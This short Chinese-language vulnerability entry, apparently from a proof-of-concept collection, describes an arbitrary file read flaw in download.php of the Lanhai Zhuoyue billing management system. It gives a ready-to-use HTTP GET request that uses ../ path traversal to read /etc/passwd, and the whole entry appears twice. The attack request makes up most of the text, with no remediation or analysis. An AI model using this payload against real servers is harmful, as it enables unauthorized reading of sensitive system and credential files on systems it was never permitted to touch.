蓝海卓越计费管理系统 任意文件读取漏洞
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.
poc:
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:
via:peiqi
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.
poc:
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:
via:peiqi